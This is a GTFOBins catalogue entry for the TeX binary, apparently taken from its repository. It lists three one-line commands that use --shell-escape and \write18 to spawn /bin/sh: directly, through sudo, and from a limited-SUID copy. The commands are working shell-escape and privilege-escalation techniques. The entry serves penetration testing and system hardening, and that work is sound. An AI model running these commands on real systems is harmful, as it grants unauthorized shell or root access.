GTFOBins.github.io/_gtfobins/tex.md
2021-04-26 16:07:59 +02:00

13 lines
254 B
Markdown

---
functions:
shell:
- code: |
tex --shell-escape '\write18{/bin/sh}\end'
sudo:
- code: |
sudo tex --shell-escape '\write18{/bin/sh}\end'
limited-suid:
- code: |
./tex --shell-escape '\write18{/bin/sh}\end'
---